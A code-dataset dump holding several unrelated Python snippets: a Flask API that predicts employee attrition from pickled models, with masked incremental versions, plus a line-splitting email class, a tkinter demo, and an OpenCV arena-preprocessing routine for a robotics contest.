df_1 = pd.read_csv(utils.model_dir + companyid + '/preprocessedData_test' + strtodate + '.csv', low_memory=False)
feather.write_dataframe(df_1, utils.model_dir + companyid + '/preprocessedData_test' + strtodate + '.feather')
if accountid:
df = df.loc[(df['CompId'] == int(companyid)) & (df['AccountId'].isin(accountid))].reset_index(drop=True)
df_1 = df_1.loc[(df_1['CompId'] == int(companyid)) & (df_1['AccountId'].isin(accountid))].reset_index(drop=True)
else:
df = df.loc[(df['CompId'] == int(companyid))]
df_1 = df_1.loc[(df['CompId'] == int(companyid))]
#df_1 = preprocess.preprocessDF(df, utils.model_dir + companyid + '/', np.datetime64(predictdate))
df_1 = df_1.drop(['CompId', 'AccountId', 'AttritionReasonId', 'AttritionDays', 'IsAttrition', 'ReasonId'], axis=1, errors='ignore')
print(datetime.datetime.now(), 'Predict for data', df_1.shape)
data = {}
result_class = predict_class(local_class_model, df_1)
result_reg = predict_reg(local_reg_model, df_1)
df['HiredOrReHired'] = df['HiredOrReHired'].astype('datetime64[D]')
result_date = df['HiredOrReHired'] + pd.to_timedelta(result_reg, 'D')
data['predictions'] = json.loads(pd.DataFrame(
{'accountid': df['AccountId'], 'attritionproba': result_class, 'attritiondate': result_date}).to_json(orient='records', date_format='iso'))
sys.stdout.close()
return data
|
flexible
|
{
"blob_id": "c76fd9b196b50e6fcced7e56517c0cd8ab30e24e",
"index": 7891,
"step-1": "<mask token>\n\n\[email protected]('/predict')\[email protected](parser)\nclass Predict(Resource):\n <mask token>\n\n\[email protected]('/predict/<string:companyid>/<string:accountid>')\[email protected](parser)\nclass PredictEmployeeByCompany(Resource):\n\n @api.marshal_with(modelByEmployee)\n def get(self, companyid, accountid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, [int(accountid)], args[\n 'predictdate'])\n\n\[email protected]('/predict/<string:companyid>')\[email protected](parser)\nclass PredictByCompany(Resource):\n\n @api.marshal_with(modelByEmployee)\n def get(self, companyid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, None, args['predictdate'])\n\n @api.expect(predict_accounts)\n @api.marshal_with(modelByEmployee)\n def post(self, companyid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, request.get_json()[\n 'accountids'], args['predictdate'])\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/predict')\[email protected](parser)\nclass Predict(Resource):\n\n @api.expect(predict_fields)\n @api.marshal_with(model)\n def post(self):\n args = parser.parse_args()\n return getPrediction(request.get_json(), args['predictdate'])\n\n\[email protected]('/predict/<string:companyid>/<string:accountid>')\[email protected](parser)\nclass PredictEmployeeByCompany(Resource):\n\n @api.marshal_with(modelByEmployee)\n def get(self, companyid, accountid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, [int(accountid)], args[\n 'predictdate'])\n\n\[email protected]('/predict/<string:companyid>')\[email protected](parser)\nclass PredictByCompany(Resource):\n\n @api.marshal_with(modelByEmployee)\n def get(self, companyid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, None, args['predictdate'])\n\n @api.expect(predict_accounts)\n @api.marshal_with(modelByEmployee)\n def post(self, companyid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, request.get_json()[\n 'accountids'], args['predictdate'])\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\[email protected]('/predict')\[email protected](parser)\nclass Predict(Resource):\n\n @api.expect(predict_fields)\n @api.marshal_with(model)\n def post(self):\n args = parser.parse_args()\n return getPrediction(request.get_json(), args['predictdate'])\n\n\[email protected]('/predict/<string:companyid>/<string:accountid>')\[email protected](parser)\nclass PredictEmployeeByCompany(Resource):\n\n @api.marshal_with(modelByEmployee)\n def get(self, companyid, accountid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, [int(accountid)], args[\n 'predictdate'])\n\n\[email protected]('/predict/<string:companyid>')\[email protected](parser)\nclass PredictByCompany(Resource):\n\n @api.marshal_with(modelByEmployee)\n def get(self, companyid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, None, args['predictdate'])\n\n @api.expect(predict_accounts)\n @api.marshal_with(modelByEmployee)\n def post(self, companyid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, request.get_json()[\n 'accountids'], args['predictdate'])\n\n\n<mask token>\n\n\ndef predict_reg(local_model, df):\n if os.path.isfile(local_model):\n model = pickle.load(open(local_model, 'rb'))\n result = pd.Series(model.predict(df)).apply(int).clip(lower=0)\n else:\n result = pd.Series(random.sample(range(100, 1000), df.shape[0]))\n return result\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\[email protected]('/predict')\[email protected](parser)\nclass Predict(Resource):\n\n @api.expect(predict_fields)\n @api.marshal_with(model)\n def post(self):\n args = parser.parse_args()\n return getPrediction(request.get_json(), args['predictdate'])\n\n\[email protected]('/predict/<string:companyid>/<string:accountid>')\[email protected](parser)\nclass PredictEmployeeByCompany(Resource):\n\n @api.marshal_with(modelByEmployee)\n def get(self, companyid, accountid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, [int(accountid)], args[\n 'predictdate'])\n\n\[email protected]('/predict/<string:companyid>')\[email protected](parser)\nclass PredictByCompany(Resource):\n\n @api.marshal_with(modelByEmployee)\n def get(self, companyid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, None, args['predictdate'])\n\n @api.expect(predict_accounts)\n @api.marshal_with(modelByEmployee)\n def post(self, companyid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, request.get_json()[\n 'accountids'], args['predictdate'])\n\n\n<mask token>\n\n\ndef predict_class(local_model, df):\n if os.path.isfile(local_model):\n model = pickle.load(open(local_model, 'rb'))\n result = pd.Series(model.predict_proba(df)[:, 1])\n else:\n result = pd.Series(random.sample(range(1000), df.shape[0])).divide(\n 10000)\n return result\n\n\ndef predict_reg(local_model, df):\n if os.path.isfile(local_model):\n model = pickle.load(open(local_model, 'rb'))\n result = pd.Series(model.predict(df)).apply(int).clip(lower=0)\n else:\n result = pd.Series(random.sample(range(100, 1000), df.shape[0]))\n return result\n\n\n<mask token>\n\n\ndef getPredictionByEmployee(companyid, accountid=None, predictdate=np.\n datetime64('today')):\n sys.stdout = open(utils.log_dir + time.strftime('%Y%m%d-%H%M%S') +\n '_predict.txt', 'w')\n print(datetime.datetime.now(), 'Predict for company', companyid)\n local_class_model = (utils.model_dir + companyid +\n '/classification/model.pkl')\n local_reg_model = utils.model_dir + companyid + '/regression/model.pkl'\n if np.datetime64(predictdate) >= np.datetime64('today'):\n strtodate = ''\n else:\n strtodate = np.datetime64(predictdate).astype(datetime.datetime\n ).strftime('%Y%m')\n if os.path.isfile(utils.data_dir + companyid + '/preparedData_test' +\n strtodate + '.feather'):\n df = feather.read_dataframe(utils.data_dir + companyid +\n '/preparedData_test' + strtodate + '.feather')\n else:\n df = pd.read_csv(utils.data_dir + companyid + '/preparedData_test' +\n strtodate + '.csv', low_memory=False)\n feather.write_dataframe(df, utils.data_dir + companyid +\n '/preparedData_test' + strtodate + '.feather')\n if os.path.isfile(utils.model_dir + companyid +\n '/preprocessedData_test' + strtodate + '.feather'):\n df_1 = feather.read_dataframe(utils.model_dir + companyid +\n '/preprocessedData_test' + strtodate + '.feather')\n else:\n df_1 = pd.read_csv(utils.model_dir + companyid +\n '/preprocessedData_test' + strtodate + '.csv', low_memory=False)\n feather.write_dataframe(df_1, utils.model_dir + companyid +\n '/preprocessedData_test' + strtodate + '.feather')\n if accountid:\n df = df.loc[(df['CompId'] == int(companyid)) & df['AccountId'].isin\n (accountid)].reset_index(drop=True)\n df_1 = df_1.loc[(df_1['CompId'] == int(companyid)) & df_1[\n 'AccountId'].isin(accountid)].reset_index(drop=True)\n else:\n df = df.loc[df['CompId'] == int(companyid)]\n df_1 = df_1.loc[df['CompId'] == int(companyid)]\n df_1 = df_1.drop(['CompId', 'AccountId', 'AttritionReasonId',\n 'AttritionDays', 'IsAttrition', 'ReasonId'], axis=1, errors='ignore')\n print(datetime.datetime.now(), 'Predict for data', df_1.shape)\n data = {}\n result_class = predict_class(local_class_model, df_1)\n result_reg = predict_reg(local_reg_model, df_1)\n df['HiredOrReHired'] = df['HiredOrReHired'].astype('datetime64[D]')\n result_date = df['HiredOrReHired'] + pd.to_timedelta(result_reg, 'D')\n data['predictions'] = json.loads(pd.DataFrame({'accountid': df[\n 'AccountId'], 'attritionproba': result_class, 'attritiondate':\n result_date}).to_json(orient='records', date_format='iso'))\n sys.stdout.close()\n return data\n",
"step-5": "from . import preprocess\nfrom . import utils\nimport random\nimport pickle\nimport feather\nimport time\nimport datetime\nimport sys\nimport os\nimport numpy as np\nimport pandas as pd\nimport json\nfrom ...main import api\nfrom flask import request\nfrom flask_restplus import Resource, fields\n\nimport warnings\nwarnings.simplefilter(\"ignore\")\n\n\npredict_fields = api.model('Prediction Data', {\n})\n\npredict_accounts = api.model('Prediction Data By Employee', {\n \n})\n\nprediction = api.model('Prediction', {'attritionproba': fields.Float(\n example=0.345), 'attritiondate': fields.String(example='2020-10-06T00:00:00.000Z')})\n\npredictionByEmployee = api.model('Prediction By Employee', {})\n\nmodel = api.model(\n 'Predictions', {'predictions': fields.List(fields.Nested(prediction))})\n\nmodelByEmployee = api.model(\n 'Predictions By Employee', {'predictions': fields.List(fields.Nested(predictionByEmployee))})\n\nparser = api.parser()\nparser.add_argument('predictdate', location='args', default=datetime.date.today().strftime(\"%Y-%m-%d\"), help='Predict date', required=True)\n\n\[email protected](\"/predict\")\[email protected](parser)\nclass Predict(Resource):\n @api.expect(predict_fields)\n @api.marshal_with(model)\n def post(self):\n args = parser.parse_args()\n return getPrediction(request.get_json(), args['predictdate'])\n\n\[email protected](\"/predict/<string:companyid>/<string:accountid>\")\[email protected](parser)\nclass PredictEmployeeByCompany(Resource):\n @api.marshal_with(modelByEmployee)\n def get(self, companyid, accountid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, [int(accountid)], args['predictdate'])\n\n\[email protected](\"/predict/<string:companyid>\")\[email protected](parser)\nclass PredictByCompany(Resource):\n @api.marshal_with(modelByEmployee)\n def get(self, companyid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, None, args['predictdate'])\n\n @api.expect(predict_accounts)\n @api.marshal_with(modelByEmployee)\n def post(self, companyid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, request.get_json()['accountids'], args['predictdate'])\n\n\npackage_directory = os.path.dirname(os.path.abspath(__file__))\n\n\ndef predict_class(local_model, df):\n if os.path.isfile(local_model):\n model = pickle.load(open(local_model, 'rb'))\n result = pd.Series(model.predict_proba(df)[:, 1])\n else:\n result = pd.Series(random.sample(\n range(1000), df.shape[0])).divide(10000)\n\n return result\n\n\ndef predict_reg(local_model, df):\n if os.path.isfile(local_model):\n model = pickle.load(open(local_model, 'rb'))\n result = pd.Series(model.predict(df)).apply(int).clip(lower=0)\n else:\n result = pd.Series(random.sample(range(100, 1000), df.shape[0]))\n return result\n\n\ndef getPrediction(data, predictdate=np.datetime64('today')):\n\n request_json = data\n\n if request_json and 'instances' in request_json and 'companyid' in request_json and 'columns' in request_json:\n sys.stdout = open(utils.log_dir + time.strftime(\"%Y%m%d-%H%M%S\") + '_predict.txt', 'w')\n # copy model\n companyid = str(request_json['companyid'])\n print(datetime.datetime.now(), 'Predict for company', companyid)\n local_class_model = utils.model_dir + companyid + '/classification/model.pkl'\n local_reg_model = utils.model_dir + companyid + '/regression/model.pkl'\n columns = request_json['columns']\n df = pd.DataFrame(request_json['instances'], columns=columns)\n df_1 = preprocess.preprocessDF(df, utils.model_dir + companyid + '/', predictdate)\n df_1 = df_1.drop(['CompId', 'AccountId', 'AttritionReasonId', 'AttritionDays', 'IsAttrition', 'ReasonId'], axis=1, errors='ignore')\n data = {}\n result_class = predict_class(local_class_model, df_1)\n\n result_reg = predict_reg(local_reg_model, df_1)\n\n df['HiredOrReHired'] = df['HiredOrReHired'].astype('datetime64[D]')\n result_date = df['HiredOrReHired'] + pd.to_timedelta(result_reg, 'D')\n\n data['predictions'] = json.loads(pd.DataFrame({'attritionproba': result_class, 'attritiondate': result_date}).to_json(orient='records', date_format='iso'))\n sys.stdout.close()\n return data\n else:\n return {'attritionproba': 0, 'attritiondate': ''}\n\n\ndef getPredictionByEmployee(companyid, accountid=None, predictdate=np.datetime64('today')):\n sys.stdout = open(\n utils.log_dir + time.strftime(\"%Y%m%d-%H%M%S\") + '_predict.txt', 'w')\n # copy model\n\n print(datetime.datetime.now(), 'Predict for company', companyid)\n local_class_model = utils.model_dir + companyid + '/classification/model.pkl'\n local_reg_model = utils.model_dir + companyid + '/regression/model.pkl'\n\n if np.datetime64(predictdate) >= np.datetime64('today'):\n strtodate = ''\n else:\n strtodate = np.datetime64(predictdate).astype(datetime.datetime).strftime('%Y%m')\n \n if os.path.isfile(utils.data_dir + companyid + '/preparedData_test' + strtodate + '.feather'):\n df = feather.read_dataframe(utils.data_dir + companyid + '/preparedData_test' + strtodate + '.feather')\n else:\n df = pd.read_csv(utils.data_dir + companyid + '/preparedData_test' + strtodate + '.csv', low_memory=False)\n feather.write_dataframe(df, utils.data_dir + companyid + '/preparedData_test' + strtodate + '.feather')\n \n if os.path.isfile(utils.model_dir + companyid + '/preprocessedData_test' + strtodate + '.feather'):\n df_1 = feather.read_dataframe(utils.model_dir + companyid + '/preprocessedData_test' + strtodate + '.feather')\n else:\n df_1 = pd.read_csv(utils.model_dir + companyid + '/preprocessedData_test' + strtodate + '.csv', low_memory=False)\n feather.write_dataframe(df_1, utils.model_dir + companyid + '/preprocessedData_test' + strtodate + '.feather')\n\n if accountid:\n df = df.loc[(df['CompId'] == int(companyid)) & (df['AccountId'].isin(accountid))].reset_index(drop=True)\n df_1 = df_1.loc[(df_1['CompId'] == int(companyid)) & (df_1['AccountId'].isin(accountid))].reset_index(drop=True)\n else:\n df = df.loc[(df['CompId'] == int(companyid))]\n df_1 = df_1.loc[(df['CompId'] == int(companyid))]\n\n #df_1 = preprocess.preprocessDF(df, utils.model_dir + companyid + '/', np.datetime64(predictdate))\n\n df_1 = df_1.drop(['CompId', 'AccountId', 'AttritionReasonId', 'AttritionDays', 'IsAttrition', 'ReasonId'], axis=1, errors='ignore')\n print(datetime.datetime.now(), 'Predict for data', df_1.shape)\n\n data = {}\n result_class = predict_class(local_class_model, df_1)\n\n result_reg = predict_reg(local_reg_model, df_1)\n\n df['HiredOrReHired'] = df['HiredOrReHired'].astype('datetime64[D]')\n result_date = df['HiredOrReHired'] + pd.to_timedelta(result_reg, 'D')\n\n data['predictions'] = json.loads(pd.DataFrame(\n {'accountid': df['AccountId'], 'attritionproba': result_class, 'attritiondate': result_date}).to_json(orient='records', date_format='iso'))\n sys.stdout.close()\n return data\n",
"step-ids": [
6,
7,
8,
10,
15
]
}
|
[
6,
7,
8,
10,
15
] |
from Task2.src.EmailInterpreter import EmailInterpreter
import os
# Part B:
# -------
# Write a child-class of the previously written base class, which
# implements the 'split_file' function, simply by treating each line as a
# unit (it returns the list of lines).
class LineBreaker(EmailInterpreter):
def split_file(self, file_name):
with open(os.path.join(self.directory_path, file_name), 'r') as file:
lines = file.readlines()
return lines
|
normal
|
{
"blob_id": "1c6077d965f5bc8c03344b53d11851f5cd50bca8",
"index": 3346,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass LineBreaker(EmailInterpreter):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass LineBreaker(EmailInterpreter):\n\n def split_file(self, file_name):\n with open(os.path.join(self.directory_path, file_name), 'r') as file:\n lines = file.readlines()\n return lines\n",
"step-4": "from Task2.src.EmailInterpreter import EmailInterpreter\nimport os\n\n\nclass LineBreaker(EmailInterpreter):\n\n def split_file(self, file_name):\n with open(os.path.join(self.directory_path, file_name), 'r') as file:\n lines = file.readlines()\n return lines\n",
"step-5": "from Task2.src.EmailInterpreter import EmailInterpreter\nimport os\n# Part B:\n# -------\n# Write a child-class of the previously written base class, which\n# implements the 'split_file' function, simply by treating each line as a\n# unit (it returns the list of lines).\nclass LineBreaker(EmailInterpreter):\n def split_file(self, file_name):\n with open(os.path.join(self.directory_path, file_name), 'r') as file:\n lines = file.readlines()\n return lines",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def click():
ent_text = ent.get()
lab = Label(root, text=ent_text)
lab.pack()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
ent.pack()
def click():
ent_text = ent.get()
lab = Label(root, text=ent_text)
lab.pack()
<|reserved_special_token_0|>
btn.pack()
root.mainloop()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
root = Tk()
ent = Entry(root)
ent.pack()
def click():
ent_text = ent.get()
lab = Label(root, text=ent_text)
lab.pack()
btn = Button(root, text='Click Me!', command=click)
btn.pack()
root.mainloop()
<|reserved_special_token_1|>
from tkinter import *
root = Tk()
ent = Entry(root)
ent.pack()
def click():
ent_text = ent.get()
lab = Label(root, text=ent_text)
lab.pack()
btn = Button(root, text='Click Me!', command=click)
btn.pack()
root.mainloop()
<|reserved_special_token_1|>
from tkinter import *
root = Tk()
ent = Entry(root)
ent.pack()
def click():
ent_text = ent.get()
lab = Label(root, text=ent_text)
lab.pack()
btn = Button(root, text="Click Me!", command=click)
btn.pack()
root.mainloop()
|
flexible
|
{
"blob_id": "49f1b4c9c6d15b8322b83396c22e1027d241da33",
"index": 2311,
"step-1": "<mask token>\n\n\ndef click():\n ent_text = ent.get()\n lab = Label(root, text=ent_text)\n lab.pack()\n\n\n<mask token>\n",
"step-2": "<mask token>\nent.pack()\n\n\ndef click():\n ent_text = ent.get()\n lab = Label(root, text=ent_text)\n lab.pack()\n\n\n<mask token>\nbtn.pack()\nroot.mainloop()\n",
"step-3": "<mask token>\nroot = Tk()\nent = Entry(root)\nent.pack()\n\n\ndef click():\n ent_text = ent.get()\n lab = Label(root, text=ent_text)\n lab.pack()\n\n\nbtn = Button(root, text='Click Me!', command=click)\nbtn.pack()\nroot.mainloop()\n",
"step-4": "from tkinter import *\nroot = Tk()\nent = Entry(root)\nent.pack()\n\n\ndef click():\n ent_text = ent.get()\n lab = Label(root, text=ent_text)\n lab.pack()\n\n\nbtn = Button(root, text='Click Me!', command=click)\nbtn.pack()\nroot.mainloop()\n",
"step-5": "from tkinter import *\n\nroot = Tk()\nent = Entry(root)\nent.pack()\n\n\ndef click():\n ent_text = ent.get()\n lab = Label(root, text=ent_text)\n lab.pack()\n\n\nbtn = Button(root, text=\"Click Me!\", command=click)\nbtn.pack()\n\nroot.mainloop()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
def arena_preprocess(frame, M):
processed_arena = cv2.warpPerspective(frame, M, (900, 600))
in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])
h, w = processed_arena.shape[:2]
result_mask = np.zeros((h, w), np.uint8)
mask = np.zeros((h + 2, w + 2), np.uint8)
cv2.drawContours(mask, [in_corners], -1, 255, 1)
cv2.floodFill(result_mask, mask, (0, 0), 255)
processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask,
cv2.COLOR_GRAY2BGR))
warped_arena = processed_arena.copy()
processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)
arena_inv = cv2.bitwise_not(processed_arena)
processed_arena = cv2.subtract(arena_inv, processed_arena)
processed_arena = cv2.bitwise_not(processed_arena)
for y in range(0, 6):
for x in range(0, 9):
cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) *
100), (0, 0, 0), 1)
cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)
return processed_arena, warped_arena
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def getTransformationMatrix(frame):
processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)
processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)
processed_arena = cv2.equalizeHist(processed_arena)
processed_arena = cv2.adaptiveThreshold(processed_arena, 255, cv2.
ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 31, 5)
kernel = np.ones((7, 7), np.uint8)
processed_arena = cv2.erode(processed_arena, kernel)
kernel = np.ones((5, 5), np.uint8)
processed_arena = cv2.dilate(processed_arena, kernel)
contours, heirarchy = cv2.findContours(processed_arena, cv2.RETR_LIST,
cv2.CHAIN_APPROX_SIMPLE)
contours = sorted(contours, key=cv2.contourArea, reverse=True)
the_outer_contour = contours[0]
the_inner_contour = contours[1]
peri_in = cv2.arcLength(the_inner_contour, True)
peri_out = cv2.arcLength(the_outer_contour, True)
in_corners = cv2.approxPolyDP(the_inner_contour, 0.01 * peri_in, True)
out_corners = cv2.approxPolyDP(the_outer_contour, 0.01 * peri_out, True)
if len(in_corners) != 4 and len(out_corners) != 4:
return
result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])
in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:,
0, 1])]
out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners
[:, 0, 1])]
corners = (in_corners + out_corners) / 2
source_pts = np.float32(corners)
M = cv2.getPerspectiveTransform(source_pts, result_pts)
return M
<|reserved_special_token_0|>
def arena_preprocess(frame, M):
processed_arena = cv2.warpPerspective(frame, M, (900, 600))
in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])
h, w = processed_arena.shape[:2]
result_mask = np.zeros((h, w), np.uint8)
mask = np.zeros((h + 2, w + 2), np.uint8)
cv2.drawContours(mask, [in_corners], -1, 255, 1)
cv2.floodFill(result_mask, mask, (0, 0), 255)
processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask,
cv2.COLOR_GRAY2BGR))
warped_arena = processed_arena.copy()
processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)
arena_inv = cv2.bitwise_not(processed_arena)
processed_arena = cv2.subtract(arena_inv, processed_arena)
processed_arena = cv2.bitwise_not(processed_arena)
for y in range(0, 6):
for x in range(0, 9):
cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) *
100), (0, 0, 0), 1)
cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)
return processed_arena, warped_arena
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def getTransformationMatrix(frame):
processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)
processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)
processed_arena = cv2.equalizeHist(processed_arena)
processed_arena = cv2.adaptiveThreshold(processed_arena, 255, cv2.
ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 31, 5)
kernel = np.ones((7, 7), np.uint8)
processed_arena = cv2.erode(processed_arena, kernel)
kernel = np.ones((5, 5), np.uint8)
processed_arena = cv2.dilate(processed_arena, kernel)
contours, heirarchy = cv2.findContours(processed_arena, cv2.RETR_LIST,
cv2.CHAIN_APPROX_SIMPLE)
contours = sorted(contours, key=cv2.contourArea, reverse=True)
the_outer_contour = contours[0]
the_inner_contour = contours[1]
peri_in = cv2.arcLength(the_inner_contour, True)
peri_out = cv2.arcLength(the_outer_contour, True)
in_corners = cv2.approxPolyDP(the_inner_contour, 0.01 * peri_in, True)
out_corners = cv2.approxPolyDP(the_outer_contour, 0.01 * peri_out, True)
if len(in_corners) != 4 and len(out_corners) != 4:
return
result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])
in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:,
0, 1])]
out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners
[:, 0, 1])]
corners = (in_corners + out_corners) / 2
source_pts = np.float32(corners)
M = cv2.getPerspectiveTransform(source_pts, result_pts)
return M
<|reserved_special_token_0|>
def arena_preprocess(frame, M):
processed_arena = cv2.warpPerspective(frame, M, (900, 600))
in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])
h, w = processed_arena.shape[:2]
result_mask = np.zeros((h, w), np.uint8)
mask = np.zeros((h + 2, w + 2), np.uint8)
cv2.drawContours(mask, [in_corners], -1, 255, 1)
cv2.floodFill(result_mask, mask, (0, 0), 255)
processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask,
cv2.COLOR_GRAY2BGR))
warped_arena = processed_arena.copy()
processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)
arena_inv = cv2.bitwise_not(processed_arena)
processed_arena = cv2.subtract(arena_inv, processed_arena)
processed_arena = cv2.bitwise_not(processed_arena)
for y in range(0, 6):
for x in range(0, 9):
cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) *
100), (0, 0, 0), 1)
cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)
return processed_arena, warped_arena
<|reserved_special_token_0|>
def get_robot_space(frame):
frame = cv2.bilateralFilter(frame, 5, 99, 198)
source_pts = np.float32([[24, 56], [27, 444], [608, 47], [615, 437]])
result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])
M = cv2.getPerspectiveTransform(source_pts, result_pts)
warped_arena = cv2.warpPerspective(frame, M, (900, 600))
for y in range(0, 6):
for x in range(0, 9):
cv2.line(warped_arena, (x * 100, y * 100), (x * 100, (y + 1) *
100), (0, 0, 0), 1)
cv2.line(warped_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)
return warped_arena
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import cv2
import numpy as np
<|reserved_special_token_0|>
def getTransformationMatrix(frame):
processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)
processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)
processed_arena = cv2.equalizeHist(processed_arena)
processed_arena = cv2.adaptiveThreshold(processed_arena, 255, cv2.
ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 31, 5)
kernel = np.ones((7, 7), np.uint8)
processed_arena = cv2.erode(processed_arena, kernel)
kernel = np.ones((5, 5), np.uint8)
processed_arena = cv2.dilate(processed_arena, kernel)
contours, heirarchy = cv2.findContours(processed_arena, cv2.RETR_LIST,
cv2.CHAIN_APPROX_SIMPLE)
contours = sorted(contours, key=cv2.contourArea, reverse=True)
the_outer_contour = contours[0]
the_inner_contour = contours[1]
peri_in = cv2.arcLength(the_inner_contour, True)
peri_out = cv2.arcLength(the_outer_contour, True)
in_corners = cv2.approxPolyDP(the_inner_contour, 0.01 * peri_in, True)
out_corners = cv2.approxPolyDP(the_outer_contour, 0.01 * peri_out, True)
if len(in_corners) != 4 and len(out_corners) != 4:
return
result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])
in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:,
0, 1])]
out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners
[:, 0, 1])]
corners = (in_corners + out_corners) / 2
source_pts = np.float32(corners)
M = cv2.getPerspectiveTransform(source_pts, result_pts)
return M
<|reserved_special_token_0|>
def arena_preprocess(frame, M):
processed_arena = cv2.warpPerspective(frame, M, (900, 600))
in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])
h, w = processed_arena.shape[:2]
result_mask = np.zeros((h, w), np.uint8)
mask = np.zeros((h + 2, w + 2), np.uint8)
cv2.drawContours(mask, [in_corners], -1, 255, 1)
cv2.floodFill(result_mask, mask, (0, 0), 255)
processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask,
cv2.COLOR_GRAY2BGR))
warped_arena = processed_arena.copy()
processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)
arena_inv = cv2.bitwise_not(processed_arena)
processed_arena = cv2.subtract(arena_inv, processed_arena)
processed_arena = cv2.bitwise_not(processed_arena)
for y in range(0, 6):
for x in range(0, 9):
cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) *
100), (0, 0, 0), 1)
cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)
return processed_arena, warped_arena
<|reserved_special_token_0|>
def get_robot_space(frame):
frame = cv2.bilateralFilter(frame, 5, 99, 198)
source_pts = np.float32([[24, 56], [27, 444], [608, 47], [615, 437]])
result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])
M = cv2.getPerspectiveTransform(source_pts, result_pts)
warped_arena = cv2.warpPerspective(frame, M, (900, 600))
for y in range(0, 6):
for x in range(0, 9):
cv2.line(warped_arena, (x * 100, y * 100), (x * 100, (y + 1) *
100), (0, 0, 0), 1)
cv2.line(warped_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)
return warped_arena
<|reserved_special_token_1|>
"""
* Team Id : LM#4787
* Author List : Arjun S, Vinod, Arvind, Vishnu
* Filename: ArenaPreprocessor.py
* Theme: Launch A Module
* Functions: arena_preprocess, getTransformationMatrix, get_robot_space
* Global Variables: None
"""
import cv2
import numpy as np
"""
* Function Name: getTransformationMatrix
* Input: frame - (raw camera feed of the arena)
* Output: perspective transformation matrix
* Logic: Uses image processing techniques and finds contours for outer border to
get transformation matrix
Each process is explained in the function
* Example Call: M = getTransformationMatrix(frame)
"""
def getTransformationMatrix(frame):
# # flips Horizontally and Vertically: Depends on Camera Setup
# arena = cv2.flip(frame, -1)
# Denoising: bilateral filter Kernel size of 99 (Preferred Over medianBlur to maintain edge info)
processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)
# To Grayscale
processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)
# Increase Contrast: for better border detection
processed_arena = cv2.equalizeHist(processed_arena)
# Adaptive Threshold to get black thick boundary: (Used over Threshold: for lighting consideration1)
